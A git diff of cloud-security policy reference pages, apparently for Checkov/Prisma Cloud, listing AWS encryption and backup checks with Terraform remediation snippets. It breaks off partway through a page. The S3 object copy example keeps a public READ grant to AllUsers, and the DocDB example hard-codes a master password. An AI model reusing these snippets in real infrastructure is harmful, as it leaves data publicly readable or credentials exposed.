https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EBSAddedBackup.yaml[CKV2_AWS_9] +|LOW + + +|xref:ensure-that-ec2-is-ebs-optimized.adoc[EC2 EBS is not optimized] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EC2EBSOptimized.py[CKV_AWS_135] +|LOW + + +|xref:ensure-that-ecr-repositories-are-encrypted.adoc[Unencrypted ECR repositories] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ECRRepositoryEncrypted.py[CKV_AWS_136] +|LOW + + +|xref:ensure-that-elastic-file-system-amazon-efs-file-systems-are-added-in-the-backup-plans-of-aws-backup.adoc[Amazon EFS does not have an AWS Backup backup plan] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EFSAddedBackup.yaml[CKV2_AWS_18] +|LOW + + +|xref:ensure-that-elastic-load-balancers-uses-ssl-certificates-provided-by-aws-certificate-manager.adoc[Elastic load balancers do not use SSL Certificates provided by AWS Certificate Manager] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ELBUsesSSL.py[CKV_AWS_127] +|HIGH + + +|xref:ensure-that-emr-clusters-have-kerberos-enabled.adoc[AWS EMR cluster is not configured with Kerberos Authentication] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EMRClusterKerberosAttributes.py[CKV_AWS_114] +|MEDIUM + + +|xref:ensure-that-only-encrypted-ebs-volumes-are-attached-to-ec2-instances.adoc[Unencrypted EBS volumes are attached to EC2 instances] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EncryptedEBSVolumeOnlyConnectedToEC2s.yaml[CKV2_AWS_2] +|LOW + + +|xref:ensure-that-rds-clusters-and-instances-have-deletion-protection-enabled.adoc[AWS RDS cluster delete protection is disabled] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSDeletionProtection.py[CKV_AWS_139] +|LOW + + +|xref:ensure-that-rds-clusters-has-backup-plan-of-aws-backup.adoc[RDS clusters do not have an AWS Backup backup plan] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/RDSClusterHasBackupPlan.yaml[CKV2_AWS_8] +|LOW + + +|xref:ensure-that-rds-database-cluster-snapshot-is-encrypted-1.adoc[AWS RDS DB snapshot is not encrypted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSClusterSnapshotEncrypted.py[CKV_AWS_146] +|MEDIUM + + +|xref:ensure-that-rds-global-clusters-are-encrypted.adoc[Unencrypted RDS global clusters] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSClusterEncrypted.py[CKV_AWS_140] +|LOW + + +|xref:ensure-that-rds-instances-have-backup-policy.adoc[AWS RDS instance without Automatic Backup setting] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DBInstanceBackupRetentionPeriod.py[CKV_AWS_133] +|LOW + + +|xref:ensure-that-redshift-cluster-is-encrypted-by-kms.adoc[AWS Redshift Cluster not encrypted using Customer Managed Key] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RedshiftClusterKMSKey.py[CKV_AWS_142] +|MEDIUM + + +|xref:ensure-that-redshift-clusters-allow-version-upgrade-by-default.adoc[Redshift clusters do not allow version upgrade by default] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RedshiftClusterAllowVersionUpgrade.py[CKV_AWS_141] +|LOW + + +|xref:ensure-that-s3-bucket-has-cross-region-replication-enabled.adoc[S3 bucket cross-region replication disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/common/graph/checks_infra/base_check.py[CKV_AWS_144] +|LOW + + 
+|xref:ensure-that-s3-bucket-has-lock-configuration-enabled-by-default.adoc[S3 bucket lock configuration disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/S3BucketObjectLock.py[CKV_AWS_143] +|LOW + + +|xref:ensure-that-s3-buckets-are-encrypted-with-kms-by-default.adoc[S3 buckets are not encrypted with KMS] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/common/graph/checks_infra/base_check.py[CKV_AWS_145] +|LOW + +|xref:ensure-that-secrets-manager-secret-is-encrypted-using-kms.adoc[AWS Secrets Manager secret is not encrypted using KMS CMK] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SecretManagerSecretEncrypted.py[CKV_AWS_149] +|MEDIUM + + +|xref:ensure-that-timestream-database-is-encrypted-with-kms-cmk.adoc[Timestream database is not encrypted with KMS CMK] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/TimestreamDatabaseKMSKey.py[CKV_AWS_160] +|MEDIUM + + +|xref:ensure-that-workspace-root-volumes-are-encrypted.adoc[Workspace root volumes are not encrypted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/WorkspaceRootVolumeEncrypted.py[CKV_AWS_156] +|MEDIUM + + +|xref:ensure-that-workspace-user-volumes-are-encrypted.adoc[Workspace user volumes are not encrypted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/WorkspaceUserVolumeEncrypted.py[CKV_AWS_155] +|MEDIUM + + +|xref:general-10.adoc[AWS ElastiCache Redis cluster with in-transit encryption disabled (Replication group)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransit.py[CKV_AWS_30] +|MEDIUM + + +|xref:general-11.adoc[AWS ElastiCache Redis cluster with Redis AUTH feature disabled] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py[CKV_AWS_31] +|MEDIUM + + +|xref:general-13.adoc[EBS volumes do not have encrypted launch configurations] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py[CKV_AWS_8] +|HIGH + + +|xref:general-14.adoc[AWS SageMaker notebook instance not configured with data encryption at rest using KMS key] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SagemakerNotebookEncryption.py[CKV_AWS_22] +|HIGH + + +|xref:general-15.adoc[AWS SNS topic has SSE disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SNSTopicEncryption.py[CKV_AWS_26] +|MEDIUM + + +|xref:general-16-encrypt-sqs-queue.adoc[AWS SQS Queue not configured with server side encryption] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SQSQueueEncryption.py[CKV_AWS_27] +|MEDIUM + + +|xref:general-17.adoc[AWS Elastic File System (EFS) with encryption for data at rest is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EFSEncryptionEnabled.py[CKV_AWS_42] +|MEDIUM + + +|xref:general-18.adoc[Neptune storage is not securely encrypted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/NeptuneClusterStorageEncrypted.py[CKV_AWS_44] +|MEDIUM + + +|xref:general-25.adoc[AWS Redshift instances are not encrypted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RedshiftClusterEncryption.py[CKV_AWS_64] +|HIGH + + +|xref:general-3-encrypt-ebs-volume.adoc[AWS EBS volumes are not encrypted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EBSEncryption.py[CKV_AWS_3] +|HIGH + + 
+|xref:general-4.adoc[AWS RDS DB cluster encryption is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/RDSEncryption.py[CKV_AWS_16] +|MEDIUM + + +|xref:general-6.adoc[DynamoDB PITR is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DynamodbRecovery.py[CKV_AWS_28] +|HIGH + +|xref:general-7.adoc[Not all data stored in the EBS snapshot is securely encrypted] +|[CKV_AWS_CUSTOM_3] +|MEDIUM + + +|xref:general-73.adoc[RDS instances do not have Multi-AZ enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSMultiAZEnabled.py[CKV_AWS_157] +|LOW + + +|xref:general-8.adoc[ECR image scan on push is not enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/ECRImageScanning.py[CKV_AWS_163] +|HIGH + + +|xref:general-9.adoc[AWS ElastiCache Redis cluster with encryption for data at rest disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtRest.py[CKV_AWS_29] +|MEDIUM + +|xref:ensure-provisioned-resources-are-not-manually-modified.adoc[AWS provisioned resources are manually modified] +|Not Supported +|HIGH + + +|=== + diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-100.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-100.adoc new file mode 100644 index 000000000..40f63d572 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-100.adoc @@ -0,0 +1,73 @@ +== AWS Image Builder component not encrypted using Customer Managed Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 60691c7d-48b5-4b19-8d4f-201f2a2d43b8 + +|Checkov Check ID +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ImagebuilderComponentEncryptedWithCMK.py[CKV_AWS_180]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+This check ensures that the Image Builder component uses AWS Key Management Service (KMS) to encrypt its contents.
+To resolve, add the ARN of your KMS key when creating the component.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_imagebuilder_component
+* *Attribute:* kms_key_id - (Optional) Amazon Resource Name (ARN) of the Key Management Service (KMS) Key used to encrypt the component.
+
+
+[source,go]
+----
+resource "aws_imagebuilder_component" "example" {
+  data = yamlencode({
+    phases = [{
+      name = "build"
+      steps = [{
+        action = "ExecuteBash"
+        inputs = {
+          commands = ["echo 'hello world'"]
+        }
+        name      = "example"
+        onFailure = "Continue"
+      }]
+    }]
+    schemaVersion = 1.0
+  })
+
+  name       = "example"
+  platform   = "Linux"
+  version    = "1.0.0"
+  kms_key_id = "ckv_kms"
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-101.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-101.adoc
new file mode 100644
index 000000000..d12db370c
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-101.adoc
@@ -0,0 +1,64 @@
+== AWS S3 Object Copy not encrypted using Customer Managed Key
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 506e2eb5-671a-4282-9c32-746d4f0abe4e
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/S3ObjectCopyEncryptedWithCMK.py[CKV_AWS_181]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+This check ensures that the S3 Object Copy uses AWS Key Management Service (KMS) to encrypt its contents.
+To resolve, add the ARN of your KMS key when creating the object copy.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_s3_object_copy
+* *Attribute:* kms_key_id - (Optional) Specifies the AWS KMS Key ARN to use for object encryption.
+This value is a fully qualified ARN of the KMS Key.
+
+
+[source,go]
+----
+resource "aws_s3_object_copy" "test" {
+  bucket = "destination_bucket"
+  key    = "destination_key"
+  source = "source_bucket/source_key"
++ kms_key_id = aws_kms_key.foo.arn
+
+  grant {
+    uri         = "http://acs.amazonaws.com/groups/global/AllUsers"
+    type        = "Group"
+    permissions = ["READ"]
+  }
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-102.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-102.adoc
new file mode 100644
index 000000000..d15b94479
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-102.adoc
@@ -0,0 +1,57 @@
+== AWS Doc DB not encrypted using Customer Managed Key
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 49040160-0201-47a2-aa6e-4a6e3202d45a
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DocDBEncryptedWithCMK.py[CKV_AWS_182]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+This check ensures that the DocDB cluster uses AWS Key Management Service (KMS) to encrypt its contents.
+To resolve, add the ARN of your KMS key when creating the cluster.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_docdb_cluster
+* *Arguments:* kms_key_id - (Optional) The ARN for the KMS encryption key.
+When specifying kms_key_id, storage_encrypted needs to be set to true.
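+
+The `kms_key_id` shown in the fix typically points at a customer managed key declared in the same configuration; a minimal sketch of such a key (the resource name and settings are illustrative, not part of this policy's check):
+
+[source,go]
+----
+resource "aws_kms_key" "docdb" {
+  description         = "Customer managed key for DocDB storage encryption"
+  enable_key_rotation = true
+}
+----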
+
+
+[source,go]
+----
+resource "aws_docdb_cluster" "docdb" {
+  cluster_identifier      = "my-docdb-cluster"
+  engine                  = "docdb"
+  master_username         = "foo"
+  master_password         = "mustbeeightchars"
+  backup_retention_period = 5
+  preferred_backup_window = "07:00-09:00"
+  skip_final_snapshot     = true
++ storage_encrypted       = true
++ kms_key_id              = "ckv_kms"
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-103.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-103.adoc
new file mode 100644
index 000000000..6c60f0d89
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-103.adoc
@@ -0,0 +1,54 @@
+== AWS EBS Snapshot Copy not encrypted using Customer Managed Key
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 0de4c4c3-9fca-4cff-9c0f-e2bcd220868e
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EBSSnapshotCopyEncryptedWithCMK.py[CKV_AWS_183]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+This check ensures that the EBS snapshot copy uses AWS Key Management Service (KMS) to encrypt its contents.
+To resolve, add the ARN of your KMS key when creating the snapshot copy.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_ebs_snapshot_copy
+* *Attribute:* kms_key_id - The ARN for the KMS encryption key.
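+
+Rather than hard-coding a key ARN, the key can be created with a stable alias and referenced through Terraform; a hedged sketch (all names are illustrative):
+
+[source,go]
+----
+resource "aws_kms_key" "snapshot" {
+  description = "Customer managed key for EBS snapshot copies"
+}
+
+resource "aws_kms_alias" "snapshot" {
+  name          = "alias/ebs-snapshot-copy"
+  target_key_id = aws_kms_key.snapshot.key_id
+}
+----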
+ + +[source,go] +---- +resource "aws_ebs_snapshot_copy" "example_copy" { + source_snapshot_id = aws_ebs_snapshot.example_snapshot.id + source_region = "us-west-2" + + kms_key_id = "ckv_kms" + tags = { + Name = "HelloWorld_copy_snap" + } +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-104.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-104.adoc new file mode 100644 index 000000000..cc4ec1d6a --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-104.adoc @@ -0,0 +1,99 @@ +== AWS Elastic File System (EFS) is not encrypted using Customer Managed Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e6c0b945-77de-490c-adb8-d085a445550d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EFSFileSystemEncryptedWithCMK.py[CKV_AWS_184] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy identifies Elastic File Systems (EFSs) which are encrypted with default KMS keys and not with Keys managed by Customer. +It is a best practice to use customer managed KMS Keys to encrypt your EFS data. +It gives you full control over the encrypted data. + +//// +=== Fix - Runtime + + +AWS Console + + +AWS EFS Encryption of data at rest can only be enabled during file system creation. +So to resolve this alert, create a new EFS with encryption enabled with the customer-managed key, then migrate all required data from the reported EFS to this newly created EFS and delete reported EFS. +To create new EFS with encryption enabled, perform the following: + +. Sign into the AWS console + +. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated + +. Navigate to EFS dashboard + +. Click on 'File systems' (Left Panel) + +. 
Click on 'Create file system' button
+
+. On the 'Configure file system access' step, specify EFS details as per your requirements and Click on 'Next Step'
+
+. On the 'Configure optional settings' step, Under 'Enable encryption' Choose 'Enable encryption of data at rest' and Select customer managed key [i.e.
++
+Other than (default) aws/elasticfilesystem] from 'Select KMS master key' dropdown list along with other parameters and Click on 'Next Step'
+
+. On the 'Review and create' step, Review all your settings and Click on 'Create File System' button
++
+To delete the reported EFS which does not have encryption, perform the following:
+
+. Sign into the AWS console
+
+. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
+
+. Navigate to EFS dashboard
+
+. Click on 'File systems' (Left Panel)
+
+. Select the reported file system
+
+. Click on 'Actions' drop-down
+
+. Click on 'Delete file system'
+
+. In the 'Permanently delete file system' popup box, to confirm the deletion enter the file system's ID and Click on 'Delete File System'
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_efs_file_system
+* *Arguments:* encrypted, kms_key_id
+
+
+[source,go]
+----
+resource "aws_efs_file_system" "enabled" {
+  creation_token = "example"
+  encrypted      = true
+  # Reference a customer managed key (the key resource name is illustrative)
+  kms_key_id     = aws_kms_key.example.arn
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-105.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-105.adoc
new file mode 100644
index 000000000..010608611
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-105.adoc
@@ -0,0 +1,77 @@
+== AWS Kinesis streams encryption is using default KMS keys instead of Customer's Managed Master Keys
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 1c49c569-2e69-4f8d-a2cf-9d5e9123109b
+
+|Checkov Check ID
+| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/KinesisStreamEncryptedWithCMK.py[CKV_AWS_185]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+This policy identifies AWS Kinesis streams that are encrypted with default KMS keys rather than customer managed master keys.
+It is a best practice to use customer managed master keys to encrypt your Amazon Kinesis stream data.
+This gives you full control over the encrypted data.
+
+////
+=== Fix - Runtime
+
+
+AWS Console
+
+
+
+. Sign in to the AWS Console
+
+. Go to Kinesis Service
+
+. Select the reported Kinesis data stream for the corresponding region
+
+. Under Server-side encryption, Click on Edit
+
+. Choose Enabled
+
+. Under KMS master key, You can choose any KMS other than the default (Default) aws/kinesis
+
+. Click Save
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_kinesis_stream
+* *Arguments:* kms_key_id
+
+
+[source,go]
+----
+resource "aws_kinesis_stream" "pass" {
+  ...
+  kms_key_id = aws_kms_key.sse_aws_kms_key_id.id
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-106.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-106.adoc
new file mode 100644
index 000000000..5d2e22e5a
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-106.adoc
@@ -0,0 +1,62 @@
+== AWS S3 bucket Object not encrypted using Customer Managed Key
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 5d5127c5-9ff5-4c17-b26e-114650e4a20f
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/S3BucketObjectEncryptedWithCMK.py[CKV_AWS_186]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+This check ensures that the S3 bucket object uses AWS Key Management Service (KMS) to encrypt its contents.
+To resolve, add the ARN of your KMS key when creating the object.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_s3_bucket_object
+* *Attribute:* kms_key_id - (Optional) Specifies the AWS KMS Key ARN to use for object encryption.
+This value is a fully qualified ARN of the KMS Key.
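+
+An existing customer managed key can also be looked up by alias with the aws_kms_key data source and its ARN passed to kms_key_id; a hedged sketch (the alias name is illustrative):
+
+[source,go]
+----
+data "aws_kms_key" "by_alias" {
+  key_id = "alias/my-cmk"
+}
+
+# elsewhere: kms_key_id = data.aws_kms_key.by_alias.arn
+----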
+
+
+[source,go]
+----
+resource "aws_s3_bucket_object" "object" {
+  bucket = "your_bucket_name"
+  key    = "new_object_key"
+  source = "path/to/file"
++ kms_key_id = "ckv_kms"
+
+  # The filemd5() function is available in Terraform 0.11.12 and later
+  # For Terraform 0.11.11 and earlier, use the md5() function and the file() function:
+  # etag = "${md5(file("path/to/file"))}"
+  etag = filemd5("path/to/file")
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-107.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-107.adoc
new file mode 100644
index 000000000..69483f366
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-107.adoc
@@ -0,0 +1,62 @@
+== AWS Sagemaker domain not encrypted using Customer Managed Key
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 1414b690-a442-4a9c-9f59-91a507b42228
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py[CKV_AWS_187]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Amazon SageMaker Feature Store enables you to create two types of stores: an online store or an offline store.
+The online store is used for low-latency, real-time inference use cases, whereas the offline store is used for training and batch inference use cases.
+When you create a feature group for online or offline use, you can provide an AWS Key Management Service customer managed key to encrypt all your data at rest.
+If you do not provide an AWS KMS key, your data is encrypted on the server side using an AWS owned or AWS managed AWS KMS key.
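+
+The description refers to SageMaker Feature Store; a feature group can pass a customer managed key for its online store roughly as follows (a hedged sketch: the resource names, feature names, and role reference are illustrative and not part of this policy's check):
+
+[source,go]
+----
+resource "aws_sagemaker_feature_group" "example" {
+  feature_group_name             = "example"
+  record_identifier_feature_name = "record_id"
+  event_time_feature_name        = "event_time"
+  role_arn                       = aws_iam_role.test.arn
+
+  feature_definition {
+    feature_name = "record_id"
+    feature_type = "String"
+  }
+
+  online_store_config {
+    security_config {
+      kms_key_id = aws_kms_key.example.arn
+    }
+  }
+}
+----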
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_sagemaker_domain
+* *Arguments:* kms_key_id - (Optional) The AWS KMS customer managed key (CMK) used to encrypt the EFS volume attached to the domain.
+
+
+[source,go]
+----
+resource "aws_sagemaker_domain" "example" {
+  domain_name = "example"
+  auth_mode   = "IAM"
+  vpc_id      = aws_vpc.test.id
+  subnet_ids  = [aws_subnet.test.id]
+
+  kms_key_id = "ckv_kms"
+
+  default_user_settings {
+    execution_role = aws_iam_role.test.arn
+  }
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-109.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-109.adoc
new file mode 100644
index 000000000..aec2daeff
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-109.adoc
@@ -0,0 +1,64 @@
+== AWS EBS Volume not encrypted using Customer Managed Key
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 6fdb8007-7c47-4ff5-a95e-ef33c6bda476
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EBSVolumeEncryptedWithCMK.py[CKV_AWS_189]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Amazon EBS automatically creates a unique AWS managed key in each Region where you store AWS resources.
+This KMS key has the alias alias/aws/ebs.
+By default, Amazon EBS uses this KMS key for encryption.
+Alternatively, you can specify a symmetric customer managed key that you created as the default KMS key for EBS encryption.
+Using your own KMS key gives you more flexibility, including the ability to create, rotate, and disable KMS keys.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_ebs_volume
+* *Attribute:* kms_key_id - (Optional) The ARN for the KMS encryption key.
+When specifying kms_key_id, encrypted needs to be set to true.
+
+NOTE: Terraform must be running with credentials which have the GenerateDataKeyWithoutPlaintext permission on the specified KMS key, as required by the EBS KMS CMK volume provisioning process, to prevent a volume from being created and almost immediately deleted.
+
+
+[source,go]
+----
+resource "aws_ebs_volume" "example" {
+  availability_zone = "us-west-2a"
+  size              = 40
++ encrypted         = true
++ kms_key_id        = "ckv_kms"
+  tags = {
+    Name = "HelloWorld"
+  }
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-110.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-110.adoc
new file mode 100644
index 000000000..7f4de1bf1
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-110.adoc
@@ -0,0 +1,63 @@
+== AWS Lustre file system not configured with CMK key
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| db822ebc-4618-4d2d-9ea0-e813bf4912a4
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/LustreFSEncryptedWithCMK.py[CKV_AWS_190]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Amazon FSx for Lustre uses a KMS key, either the AWS managed key for Amazon FSx or a custom KMS key, to encrypt and decrypt file system data.
+All scratch FSx for Lustre file systems are encrypted at rest with keys managed by the service.
+Data is encrypted using an XTS-AES-256 block cipher.
+Data is automatically encrypted before being written to the file system, and is automatically decrypted as it is read.
+The keys used to encrypt scratch file systems at rest are unique per file system and destroyed after the file system is deleted.
+For persistent file systems, you choose the KMS key used to encrypt and decrypt data, either the AWS managed key for Amazon FSx or a custom KMS key.
+You specify which key to use when you create a persistent file system.
+You can enable, disable, or revoke grants on this KMS key.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_fsx_lustre_file_system
+* *Arguments:* kms_key_id
+
+
+[source,go]
+----
+resource "aws_fsx_lustre_file_system" "example" {
+  storage_capacity            = 1200
+  subnet_ids                  = [aws_subnet.example.id]
+  deployment_type             = "PERSISTENT_1"
+  per_unit_storage_throughput = 50
+  kms_key_id                  = aws_kms_key.example.arn
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-111.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-111.adoc
new file mode 100644
index 000000000..d00dd5b9a
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-111.adoc
@@ -0,0 +1,68 @@
+== AWS Elasticache replication group not configured with CMK key
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| af6fb536-8fb7-4b60-a116-7fd9c5d5fd48
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptedWithCMK.py[CKV_AWS_191]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+ElastiCache for Redis offers default (service managed) encryption at rest, as well as the ability to use your own symmetric customer managed AWS KMS keys in AWS Key Management Service (KMS).
+Data stored on SSDs (solid-state drives) in data tiering enabled clusters is always encrypted by default.
+However, when the cluster is backed up, the snapshot data is not automatically encrypted.
+Encryption needs to be enabled on the snapshot.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_elasticache_replication_group
